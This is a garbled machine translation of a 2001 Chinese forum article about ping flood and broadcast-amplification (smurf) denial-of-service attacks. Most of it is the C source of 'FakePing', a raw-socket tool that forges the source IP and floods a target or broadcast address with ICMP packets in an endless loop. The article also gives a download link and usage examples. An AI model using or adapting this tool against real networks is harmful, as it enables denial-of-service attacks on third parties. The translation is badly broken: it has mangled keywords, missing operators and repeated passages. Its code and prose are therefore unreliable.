Ping flood attack (reproduced)

zhaozj2021-02-08  291

Sending station: BBS Shuimu Tsinghua Station (Fri May 11 22:26:59 2001)

Author: shotgun

Recently, many people come to call everyone to go to ping, what website, politics, I don't understand, but from the technical point of view, no matter what refused service attack, one condition needs to be met: Use the least resource to exchange the attacker Consumption. Like this, everyone goes to ping is not only weird: exchange the other party's minimum?

Injury; it is also a ridiculous: the people's war is probably

More than 50 years ago, in the Internet era, it is not how much more people.

A basic understanding: the center of the Internet in the United States, China's part is just a small branch of the Internet ((that is, the concept of a metropolitan area network in the United States), our cable to North America is called "North America Export ", what does it mean? The door is, in other words, it is a bottleneck, so everyone picks to ping?

First death is China's export gateway (North China

The beauty exit bandwidth is just GB level, very wide? Did you swindle with your family? ), Of course, North America is going to rest, we obviously do not see the US website, like to do Aq, may wish to say to others: "The United States is blown up!" (Strange? But it is not Have yourself a white house "Black" page to

Is it like this? It is better to turn off the country.

, Disconnect the Internet, you have a strong dream at home, imagine that we are still in a powerful Tang Dynasty, come from all over the world to worship?

Gossip less, we are today, ping is a tool that exhibits whether the network host exists by sending ICMP packets (Type 8 Code 0). For a long time, a part of the operating system (such as Win95) can not be treated Excessive PING package, resulting in ping to

Death's attack mode (with big ping packs to collapse each other or stuffed network), with the upgrade of the operating system, network bandwidth upgrade, computer hardware upgrade, current, big ping package basically does not have a big attack effect (distribution Except for attacks), if you must use the ping package to attack other hosts unless you use the TCP / IP protocol?

Other features or defects of network topology

Big attack strength (so-called positive feedback)

Under normal circumstances, the PING process is like this:

Host A Send ICMP 8,0 messages to host B

Camouflage for host C error reply

Host A ---------------------> Host B -----------------> Host C

In this case, since the host A only needs to constantly send the ping packet without the need to process the return echoreply, the attack power is doubled, and it is actually the host B and host C are the target of attack, and?

Will you leave your own traces, is a hidden method of hidden stone blessings.

The above method can be easily implemented with SOCK_RAW camouflage IP, but even if it is twice as much as it is more powerful, it is not seen how much the effect is, and how much is it? Not well, let the enemy gave us great, there is a concept called broadcast in TCP / IP, the so-called broadcast meaning?

Will receive messages sent to this address (just like radio broadcasts), if? ? That's right! If we send an ICMP to the broadcast address

Echo packet (already ping broadcast address), the result will get a lot of response, Each of the Ethernet allows reception of broadcasted packets to respond to an ICMP_ECHOREPLY, if you want to test, you can ping on the Unix machine. Your LAN's broadcast address will see a lot of responding DUP packets, which is repeated because Microsoft's ping program is not unpacking multiple responses. After receiving the first package, it will be discarded behind, the same Microsoft soft The system does not respond to the package of the broadcast address by default, so you'd better test in a large number of UNIX hosts?

Speaking here, smart you must know what I want to do? Oh, yes, when we disguise the host machine to send a PING request to a broadcast address, all the hosts in this broadcast address respond to this ping request (of course, it is responding to the host, everyone thinks Is it ping?), This way,?

Respond the number of hosts of the ping package)

I wrote a FakePing tool that can be loaded under http://www.patching.net/shotgun/fakeping.exe, using the method is fakeping.exe fakeip targetip

[Packetsize], if targetip is a broadcast address, FAKEIP is an attack target.

The source code is announced as follows: (written in a hurry, the code is more chaotic, laughing) * /

//

///

// fakeping for win2k by shotgun //

///

// Released: [2001.4] //

// Author: [Shotgun] //

// HomePage: //

// [http://it.xici.net] //

// [http://www.patch "//////////

///

//

#include

#include

#include

#include

#define seq 0x28376839

#define status_failed 0xffff File: // Error return value

Typedef struct _iphdr file: // Define IP headers

{

Unsigned char h_verlen; file: // 4 head length, 4-digit IP version number

Unsigned char TOS; File: // 8-bit service type TOS

Unsigned short total_len; file: // 16-bit total length (bytes)

UNSIGNED SHORT IDENT; File: // 16 Limits Unsigned Short Frag_and_Flags; File: // 3 Bit Number Unsigned Char Ttl; File: // 8 Bit Survival Time TTL

Unsigned char proto; file: // 8-bit protocol (TCP, UDP or other)

UNSIGNED Short Checksum; File: // 16-bit IP header checksum

Unsigned int sourceip; file: // 32 bitsource IP address

Unsigned int desip; file: // 32 bit ip address

} Ip_header;

//

/ / Define ICMP's head

Typedef struct _ihdr

{

Byte I_TYPE; File: // 8-bit type

Byte i_code; file: // 8 bit code

Ushort i_cksum; file: // 16-bit checksum

Ushort i_id; file: // Identification number (generally used process number as identification number)

Ushort i_seq; file: // message serial number

Ulong timestamp; file: // Timestamp

ICMP_HEADER;

File: // Checksum: Subfremers for calculating the checksum

Ushort Checksum (Ushort * Buffer, int size)

{Unsigned long cksum = 0; while (size> 1) {cksum = * buffer ;

Size - = SizeOf (Ushort);

}

IF (size) {

CKSUM = * (Uchar *) BUFFER;

}

CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);

CKSUM = (CKSUM >> 16);

Return (Ushort) (~ CKSUM);

}

FILE: // FAKEPING main function

INT main (int Argc, char ** argv)

{

Int DataSize, ErrorCode, Counter, Flag;

INT Timeout = 2000, SendSeq = 0, PacketSize = 32;

CHAR Sendbuf [65535] = {0};

Wsadata wsadata;

Socket SockRaw = (socket) NULL;

Struct SockAddr_in destaddr;

IP_HEADER IP_HEADER;

ICMP_HEADER ICMP_HEADER;

Char FakesourceIP [20], Destip [20];

File: // Accept command line parameters

IF (Argc <3)

{

Printf ("Fakeping By Shotgun / N");

Printf ("/ TTHIS Program Can Do Ping-Flooding From A Fakeip / N");

Printf ("/ Tusing a Broadcast IP as The Fakeip Will Enhance THE EFFECT / N");

Printf ("email: / n");

Printf ("/ tshotgun@xici.net/n");

Printf ("Homepage: / N");

Printf ("/thttp://it.xici.net/n");

Printf ("/thttp://www.patching.net/n");

Printf ("Usage: /n/tfakeding.exe fakesourceip destinationip [packetsize] / n");

Printf ("eXample: / n");

Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.255/N");

Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.200 6400 / n");

exit (0);

}

STRCPY (FakesourceIP, Argv [1]);

STRCPY (Destip, Argv [2]);

IF (Argc> 3) PacketSize = ATOI (Argv [3]);

IF (PacketSize> 60000)

{

Printf ("Error! Packet size Too Big, Must <60k / N");

exit (0);

}

Printf ("now fake% s ping% s using packet size =% d bytes / n",

FakesourceIP, Destip, PacketSize;

Printf ("/ tctrl c to quit / n");

File: // Initialize SOCK_RAW

IF ((ERRORCODE = WSAStartup (Makeword (2, 1), & WSADATA))! = 0)

{

FPrintf (stderr, "wsastartup failed:% d / n", erroorcode);

EXITPROCESS (STATUS_FAILED);

}

IF ((SockRaw = WSASASOCKET (AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) == Invalid_socket

{

FPRINTF (stderr, "wsasocket () failed:% d / n", wsagetlasterror ());

EXITPROCESS (STATUS_FAILED);

}

Flag = true;

File: // Set IP_HDRINCL with your own IP head

ErrorCode = setsockopt (SockRaw, Ipproto_IP, IP_HDRINCL, (CHAR *) & flag, sizeof (int));

IF (ErrorCode == Socket_ERROR)

Printf ("SET IP_HDRINCL ERROR! / N");

__Try {

File: // Settings Send Timeout ErrorCode = Setsockopt (SockRaw, SOL_Socket, SO_SNDTIMEO, (CHAR *) & Timeout, SizeOf (Timeout);

IF (ErrorCode == Socket_ERROR)

{

FPRINTF (stderr, "failed to set send timeout:% d / n", wsagetlasterror ());

__leave;

}

MEMSET (& DestadDR, 0, Sizeof (Destaddr));

Destaddr.sin_family = af_INet;

Destaddr.sin_addr.s_addr = inet_addr (destip);

File: // Fill the first part of IP

IP_HEADER.H_VERLEN = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); file: // High four-digit IP saddle number,? Four first length

IP_HEADER.TOTAL_LEN = HTONS (IP_HEADER) SIZEOF (ICMP_HEADER)); File: // 16-bit total length ((byte?

IP_HEADER.IDENT = 1;

FILE: / / 16-bit identification

IP_HEADER.FRAG_AND_FLAGS = 0;

FILE: // 3 bits of sign

IP_HEADER.TTL = 128;

FILE: // 8-bit survival time TTL

IP_HEADER.PROTO = ipproto_ICMP;

File: // 8-bit protocol (TCP, UDP or other)

IP_HEADER.CHECKSUM = 0;

FILE: / / 16 IP header checksum

IP_HEADER.SOURCEIP = INET_ADDR (FAKESOURCEIP); File: // 32

FILE: // Bit source IP address

IP_HEADER.Destip = inet_addr (destip);

File: // 32 bit ip address

File: // Fill the first part of ICMP

ICMP_HEADER.I_TYPE = 8;

ICMP_HEADER.I_CODE = 0;

ICMP_HEADER.I_CKSUM = 0;

ICMP_HEADER.I_ID = 2;

ICMP_HEADER.TIMESTAMP = 999;

ICMP_HEADER.I_SEQ = 999;

Memcpy (Sendbuf, & ICMP_HEADER, SIZEOF (ICMP_HEADER));

MEMSET (Sendbuf SizeOf (ICMP_HEADER), 'E', PacketSize;

ICMP_HEADER.I_CKSUM = Checksum ((USHORT *) Sendbuf, sizeof (ICMP_HEADER) PacketSize;

Memcpy (sendbuf, & ip_header, sizeof (ip_header));

Memcpy (SENDBUF SIZEOF (IP_HEADER), & ICMP_HEADER, SIZEOF (ICMP_HEADER));

MEMSET (Sendbuf SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER), 'E', PacketSize;

MEMSET (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize, 0, 1);

File: // Calculate the size of the send buffer

DataSize = SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize;

IP_HEADER.CHECKSUM = Checksum ((USHORT *) Sendbuf, Datasize;

File: // Plip the send buffer

Memcpy (sendbuf, & ip_header, sizeof (ip_header));

While (1)

{

Sleep (100);

PRINTF (".");

For (counter = 0; counter <1024; counter )

{

File: // Send ICMP Packets

Errorcode = Sendto (SockRaw, Sendbuf, DataSize, 0, (Struct SockAddr *) & Destaddr, Sizeof (Destaddr));

IF (ErrorCode == Socket_ERROR) Printf ("/ Nsend Error:% D / N", getLastError ());

}

}

} // end of try

__finally {

IF (SockRaw! = Invalid_socket) CloseSocket (SOCKRAW);

WSACLEANUP ();

}

Return 0;

} / *

Conclusion:

Patriotism is necessary, especially the enthusiasm, but the technology is not to be half a little fake, there is no more impulse, it is necessary to rely on the old and old, and FakePing technology is not a new technology on the Internet, long time ago Americans who were cast by us were all achieved. How many people should we organize now? Relying on wisdom and knowledge of Aqui Mide, once used the mirror to protect your home, we still have to impulsive and Blind blind to strong people?

Less impulse and blind, more and hard, otherwise it is still hard.

Patching heroes ......

China

Relying on the wisdom and knowledge of Aqui, once used the mirror to protect his home, we must still rely on urgency and blind Destaddr);

Less impulse and blind, more and hard, otherwise it is still hard.

Patching heroes ......

China

Supplement date: 2001-05-06 11:16:07

The purpose of writing this article is not to call on the big house to attack the US site with FakePing tools, just want to show a slight show what can be done with technical skills?

If everyone is ping is the righteous group, the "knife gun is not entry" to fight the cannon, FakePing can only be a fire gun, and the United States has developed aircraft carrier (operating system). Is it used by a big knife, a long gun, a fire to buy blessing

This is very tragic, but there is no other way? Can we go back to develop your battleship?

If the second cannons are also coming out, if the technicians of Xichang also go to exercise, we don't wear the country!

转载请注明原文地址:https://www.9cbs.com/read-1744.html

New Post(0)